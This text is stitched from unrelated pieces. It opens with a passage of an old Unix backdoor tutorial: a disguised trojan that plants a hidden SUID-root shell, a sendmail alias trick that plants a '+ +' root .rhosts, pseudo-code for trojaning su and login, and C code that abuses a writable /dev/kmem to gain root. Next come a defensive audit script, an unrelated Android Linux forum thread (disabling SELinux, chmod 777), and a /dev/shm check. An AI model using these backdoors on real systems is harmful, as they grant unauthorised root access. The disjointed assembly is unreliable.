if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in the code, but you get the idea.
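For the defending side of [11] and [12], here is an added example (not part of the quoted text or of the post above) that audits a device node such as /dev/kmem. It flags world access and, because chmod always updates ctime, it also catches a change-and-restore like the 5 minute window in [12]. The function names and verdict strings are hypothetical, and a `stat` that supports `-c` with `%a` and `%z` (GNU coreutils) is assumed.

```shell
#!/bin/sh
# Added example: audit a kernel-memory device node for the traces described above.
# Assumption: stat(1) supports -c with %a (octal mode) and %z (ctime), as GNU coreutils does.

# Print "mode|ctime" for a node. Record this while the system is known-good.
# Nodes on devtmpfs are recreated at boot, so record it again after each reboot.
node_baseline() {
    stat -c '%a|%z' "$1"
}

# Succeed when the "other" permission digit grants read (4) or write (2).
world_accessible() {
    wa_mode=$(stat -c '%a' "$1") || return 2
    case "${wa_mode#"${wa_mode%?}"}" in   # last octal digit of the mode
        [2-7]) return 0 ;;
        *)     return 1 ;;
    esac
}

# Compare a node with its recorded baseline and print one verdict:
#   MISSING           the node does not exist
#   WORLD_ACCESSIBLE  others can read or write the node right now
#   METADATA_CHANGED  the mode looks fine, but mode or ctime differs from the
#                     baseline; a chmod that was later undone still moves ctime
#   OK                mode and ctime both match the baseline
check_node() {
    cn_node=$1 cn_expected=$2
    if [ ! -e "$cn_node" ]; then
        echo MISSING
    elif world_accessible "$cn_node"; then
        echo WORLD_ACCESSIBLE
    elif [ "$(node_baseline "$cn_node")" != "$cn_expected" ]; then
        echo METADATA_CHANGED
    else
        echo OK
    fi
}

# Command-line use:
#   sh audit.sh record /dev/kmem            prints the baseline to store
#   sh audit.sh check  /dev/kmem "<base>"   prints the verdict
case "${1:-}" in
    record) node_baseline "$2" ;;
    check)  check_node "$2" "$3" ;;
esac
```

Store the baseline somewhere the audited account cannot write, otherwise it can simply be re-recorded after the change.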

[Guide] Running Linux on Android with 3D Acceleration / OpenGL (Root Required)

All credits go to:
Hentacler for making Sparkle
Meefik for making Linux Deploy
Now on to the tutorial!
Requirements:
Sparkle
Linux Deploy
Termux
Now that you have all those apps installed, let's continue
Open Termux then enter:
Code:
su
Once in root mode enter:
Code:
setenforce 0
Then exit:
Code:
exit
Open Linux Deploy and configure it to your liking
My configuration:
Code:
Distribution: Debian
Architecture: arm64
Distribution Suite: unstable
-
Installation type: File
-
Image size: 32GB
Then set your username and password, for this tutorial I set my username to:
Code:
android
And I'm not gonna tell you my password
After you've set up your configuration scroll down and configure init, mounts and ssh
INIT:
Code:
Enable: On
Init system: run-parts
Init settings:
- Init path: /etc/rc.local
- Init user: android
- Async: Disabled
MOUNTS:
Code:
Enable: On
Mount points:
- /data/data/com.sion.sparkle/files - /sparkle
SSH:
Code:
Enable: On
SSH settings:
- Port: 22
- SSH options:
Now that you've set this all up, go back to the main overview screen of Linux Deploy, hit the triple dot menu and install!
After the install is done, hit START
Now open Termux and install SSH:
Code:
pkg install openssh
then connect to linux via SSH: (username is the username set in Linux Deploy)
Code:
ssh [email protected]
Now you've connected you need to install some packages:
Code:
sudo apt install weston
sudo apt install xwayland
sudo apt install nano
sudo apt install dbus-x11
Also install your desktop environment of choice, for this tutorial I'm going with KDE:
Code:
sudo apt install kde-full
Once everything is done installing you need to configure some scripts:
Code:
nano sparkle.sh
Now paste this: (make sure to change "startplasma-x11" to your preferred DE, if you're also using KDE then you don't need to change anything)
Code:
#!/bin/bash
set -e
sudo chmod 777 /sparkle
sudo chmod 777 /sparkle/wayland-0
XDG_RUNTIME_DIR=/sparkle Xwayland &
sleep 1
export DISPLAY=:0
startplasma-x11
Now open Sparkle and click "edit user.sh" and delete everything then hit "save", Go back to the main screen of Sparkle and hit "Start", you should see a notification appear in your status bar
Now to start everything go back to Termux and assuming you're still SSH'ed into Linux type:
Code:
sh sparkle.sh
and enjoy!
Bonus step:
If you want everything to automatically start when pressing "START" in Linux Deploy then you can configure this
Open Termux and connect to Linux via SSH and change the permissions/edit the rc.local file: (edit username to the username set in Linux Deploy)
Code:
sudo chmod +x /etc/rc.local
sudo chmod +x /home/username/sparkle.sh
sudo nano /etc/rc.local
In nano paste: (once again change username to the username in Linux Deploy)
Code:
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
/home/username/sparkle.sh
exit 0
Now every time you want to use Linux just open Sparkle, hit "Start", then go to Linux Deploy and start linux and your DE will automatically load up on your screen without entering a single command!
Unfortunately, this method doesn't give hardware 3d acceleration. Just very slow software emulation. It is much harder or even not possible to achieve true acceleration on android handhelds.
Hi
What version of Sparkle did you use? I've tried this tutorial here but received an error of wayland-0 not found when I try to run my linux installation on my device
I've looked in the folder /data/data/com.sion.sparkle/files and this folder is empty
Thanks for the tutorial!
Got any images or a video you can share?
It works
I managed to use it, but with xfce KDE had a black screen, and I couldn't use the audio even though I made the alsa plugin, and it doesn't rotate the screen, but it's very good.
I have One Plus 8 pro.
So my results with this software 3D acceleration are that the performance really sucks, but it's amazing for now because you need this basic acceleration in almost everything. I can now render videos on my phone in kdenlive, and the phone has kinda good CPU performance, so there is no problem. Basically I can now run in this chroot everything that can be run on a raspi, and I am also messing around with BOX86, which is a hardware translation of arm to x86 architectures. So far I can run x86 apps for linux inside the chroot, and now with this little tool I can maybe get wine x86 running, which means windows apps support on android, yeeey. Of course with this low performance of a GPU I could at best try games before year 2000, and maybe if they start up have some good fps, but I highly doubt that because the raspi has problems running (in twister os) even unreal tournament, and the raspi has 5 to 6 times higher performance than this software accel.
Benchmarks I did were glxgears, I got anywhere from 200 to 270 fps, which is not really much.
Also I used a 2 desktop config: started the one that's built in vnc from the app and then started sparkle, connected to it and had a second desktop start up using lxde. On my phone the screen really sucks to work with, so I used scrcpy to mirror the screen of the phone to the PC, so basically I have full control remotely. I hope that this will have future version development to improve on the code so that we could get more performance out of this.
Image below.
I am using LXDE with Sparkle. I would like a lower screen resolution, all things look so small. I can do that with XSDL, how in Sparkle?
@HolyChickenGuy
Thanks for the well done tutorial ! I followed it and it worked out of the box.
However, two issues I came across to which I did not find the solution, yet:
1. Is there a way to rotate the screen ?
2. How can I bring the X-window to the second screen connected via USB->HDMI adapter ? I tried to set DISPLAY:1 but 1 was not found and :0 is the devices screen.
Cheers mate and keep up the good work.
You can also use Termux Desktop
Termux desktop is much faster and easier to use and you can experience a complete Linux GUI with termux, and it is also lightweight.
saad maqsood said:
Termux desktop is much faster and easier to use and you can experience a complete Linux GUI with termux, and it is also lightweight.
The described way basically is using Termux the way you propose. However it adds the 3D acceleration by using sparkle which is definitely a plus.
---------- Post added at 09:49 PM ---------- Previous post was at 09:47 PM ----------
flunkyball said:
@HolyChickenGuy
Thanks for the well done tutorial ! I followed it and it worked out of the box.
However, two issues I came across to which I did not find the solution, yet:
1. Is there a way to rotate the screen ?
2. How can I bring the X-window to the second screen connected via USB->HDMI adapter ? I tried to set DISPLAY:1 but 1 was not found and :0 is the devices screen.
Cheers mate and keep up the good work.
Okay, rotating the screen is done by rotating Termux BEFORE you start the windowmanager.
But - for bringing it up on the external monitor I haven't found the trick yet
lower resolution in Sparkle app? relative mouse is possible?
but what if i want to install LXQt on my device
#!/bin/bash
set -e
sudo chmod 777 /sparkle
sudo chmod 777 /sparkle/wayland-0
XDG_RUNTIME_DIR=/sparkle Xwayland &
sleep 1
export DISPLAY=:0
startplasma-x11
what should i change in the script??????
sorry for the probably dumb question but Xsdl seems to work quite well in my use cases (like watching youtube videos in 360p on my Samsung Tab S5e) ...
... so I am wondering : what are the advantages of Sparkle/Wayland over Xsdl ?? ... will my youtube videos be smoother ??
... does Sparkle/Wayland has better touch support than Xsdl ?? ... for example can you scroll a web browser window by touching inside the window (not the scrollbar) with your finger ??
pierro78 said:
sorry for the probably dumb question but Xsdl seems to work quite well in my use cases (like watching youtube videos in 360p on my Samsung Tab S5e) ...
... so I am wondering : what are the advantages of Sparkle/Wayland over Xsdl ?? ... will my youtube videos be smoother ??
... does Sparkle/Wayland has better touch support than Xsdl ?? ... for example can you scroll a web browser window by touching inside the window (not the scrollbar) with your finger ??
you sure can get 1080 on a tab s5e with xsdl...
sparkle app is for sure more lightweight but in some situations xsdl is better, at least with some games, at least with my experience
did you compile and use the android-shmem library?
zanfix said:
you sure can get 1080 on a tab s5e with xsdl...
sparkle app is for sure more lightweight but in some situations xsdl is better, at least with some games, at least with my experience
did you compile and use the android-shmem library?
wow 1080 ! that would be awesome ! thanks for the info !!
actually 360p is not so smooth on my S5e without android-shmem library ...
if I understand correctly I just have to compile that in my chroot and then the shared memory feature is already supported in the Xserver xsdl that I installed from the playstore ??
thanks again !!
pierro78 said:
wow 1080 ! that would be awesome ! thanks for the info !!
actually 360p is not so smooth on my S5e without android-shmem library ...
if I understand correctly I just have to compile that in my chroot and then the shared memory feature is already supported in the Xserver xsdl that I installed from the playstore ??
thanks again !!
android-shmem library can give you a performance boost if the application you are running can use the x server MIT-SHM extension
For video playback in a web browser, firefox-esr for example, the android-shm library will not give you any performance gain...
Since there is no hardware acceleration in xsdl, In order to put the minimum possible load on the cpu you should match the screen resolution of the xserver with the target max resolution of the videos you are planning to playback.
My tab s6 has 2560x1600 native resolution, i run the xserver at 1920x1200 so I keep the aspect ratio of the screen but match the clip (tube video) native resolution (so that no rescaling will happen)
I can get acceptable youtube video playback also on my old pixelc c, that has a quadcore a57
well I don't know what I did wrong previously ... my youtube videos seem to play nice on 1080 in Xserver xsdl with arm64 vivaldi in my chroot (Tab S5e) with or without
env LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" icewm&
now !
and I don't see any difference with or without LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" in vivaldi although it may support x server MIT-SHM extension as you said ??
also I have errors when using /home/pierro78/android-shmem/libandroid-shmem-aarch64.so when I start icewm (same errors if regular user or root) :
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
and when I start vivaldi as regular user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2946039 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
[7437:7437:0426/232122.758794:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
shmget: key 0 size 112140 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
shmget: key 0 size 368460 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
or if I start vivaldi as root user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2831220 flags 01606 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00001f6e
shmget: ID 0 shmid 1f6e0001 FD 36 size 2834432
shmat: shmid 1f6e0001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x71b6582000 for FD 36 ID 0
shm_remove: deleting shmid 1f6e0001
shm_remove: shmid 1f6e0001 is still mapped to addr 0x71b6582000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x71b6582000 for FD 36 ID 0 shmid 1f6e0001
shmdt: deleting shmid 1f6e0001
listening_thread: thread started
[7990:7990:0426/232440.532571:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
I am not sure how to check if my libandroid-shmem-aarch64.so is working ??
I would expect some "files" in /dev/shm but there is nothing there ...
pierro78 said:
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
PS : my bad : these error messages are coming from my xfce4-terminal, not icewm ...
pierro78 said:
well I don't know what I did wrong previously ... my youtube videos seem to play nice on 1080 in Xserver xsdl with arm64 vivaldi in my chroot (Tab S5e) with or without
env LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" icewm&
now !
and I don't see any difference with or without LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" in vivaldi although it may support x server MIT-SHM extension as you said ??
also I have errors when using /home/pierro78/android-shmem/libandroid-shmem-aarch64.so when I start icewm (same errors if regular user or root) :
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
and when I start vivaldi as regular user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2946039 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
[7437:7437:0426/232122.758794:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
shmget: key 0 size 112140 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
shmget: key 0 size 368460 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
or if I start vivaldi as root user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2831220 flags 01606 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00001f6e
shmget: ID 0 shmid 1f6e0001 FD 36 size 2834432
shmat: shmid 1f6e0001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x71b6582000 for FD 36 ID 0
shm_remove: deleting shmid 1f6e0001
shm_remove: shmid 1f6e0001 is still mapped to addr 0x71b6582000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x71b6582000 for FD 36 ID 0 shmid 1f6e0001
shmdt: deleting shmid 1f6e0001
listening_thread: thread started
[7990:7990:0426/232440.532571:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
I am not sure how to check if my libandroid-shmem-aarch64.so is working ??
I would expect some "files" in /dev/shm but there is nothing there ...
looks fine when run as root...
is /dev/shm mounted as tmpfs?
/dev/shm should then have 1777 permissions
zanfix said:
looks fine when run as root...
is /dev/shm mounted as tmpfs?
/dev/shm should then have 1777 permissions
It looks like I am good :
[email protected]:/dev$ mount
/dev/block/mmcblk0p57 on / type ext4 (rw,noatime,seclabel,discard,journal_checksum,noauto_da_alloc,resgid=1065,errors=panic,i_version,data=ordered)
proc on /proc type proc (rw,relatime,gid=3009,hidepid=2)
sys on /sys type sysfs (rw,relatime,seclabel)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,seclabel,size=2871960k,nr_inodes=717990,mode=755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime,seclabel)
devpts on /dev/pts type devpts (rw,relatime,seclabel,mode=600,ptmxmode=000)
[email protected]:/dev$ ls -ld shm
drwxrwxrwt. 2 root root 40 Apr 26 23:59 shm
[email protected]:/dev$
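The two checks asked for above (is /dev/shm a tmpfs mount, and is its mode 1777) as an added script that is not part of any post in this thread. It reads the same `mount` and `ls -ld` output shown in the last post; the sample lines are copied from that post, and the function names and verdict strings are hypothetical.

```shell
#!/bin/sh
# Added example: evaluate `mount` output and an `ls -ld /dev/shm` line.

# Sample input, copied from the output posted above.
SAMPLE_MOUNTS='tmpfs on /dev type tmpfs (rw,nosuid,relatime,seclabel,size=2871960k,nr_inodes=717990,mode=755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime,seclabel)'
SAMPLE_LS='drwxrwxrwt. 2 root root 40 Apr 26 23:59 shm'

# $1 = full `mount` listing, $2 = one `ls -ld /dev/shm` line. Prints one verdict:
#   NOT_MOUNTED         no mount entry for /dev/shm
#   NOT_TMPFS           /dev/shm is mounted, but not as tmpfs
#   NOT_WORLD_WRITABLE  others cannot create files in the directory
#   NO_STICKY_BIT       world-writable without the sticky bit, so any user
#                       can delete or replace another user's segments
#   MODE_NOT_1777       sticky and world-writable, but some other bit is off
#   OK                  tmpfs with mode 1777 (drwxrwxrwt)
shm_verdict() {
    sv_mounts=$1 sv_ls=$2
    # The last matching entry wins, since later mounts shadow earlier ones.
    sv_type=$(printf '%s\n' "$sv_mounts" |
        awk '$2 == "on" && $3 == "/dev/shm" && $4 == "type" { t = $5 } END { print t }')
    sv_perms=$(printf '%s\n' "$sv_ls" | cut -c1-10)   # a trailing "." or "+" is dropped
    sv_ow=$(printf '%s\n' "$sv_perms" | cut -c9)      # other-write position
    sv_st=$(printf '%s\n' "$sv_perms" | cut -c10)     # other-exec / sticky position
    if [ -z "$sv_type" ]; then
        echo NOT_MOUNTED
    elif [ "$sv_type" != tmpfs ]; then
        echo NOT_TMPFS
    elif [ "$sv_ow" != w ]; then
        echo NOT_WORLD_WRITABLE
    elif [ "$sv_st" != t ] && [ "$sv_st" != T ]; then
        echo NO_STICKY_BIT
    elif [ "$sv_perms" != drwxrwxrwt ]; then
        echo MODE_NOT_1777
    else
        echo OK
    fi
}

# Run the same check against the live system (inside the chroot, as the user
# that starts the X clients).
shm_check_live() {
    shm_verdict "$(mount)" "$(ls -ld /dev/shm)"
}
```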
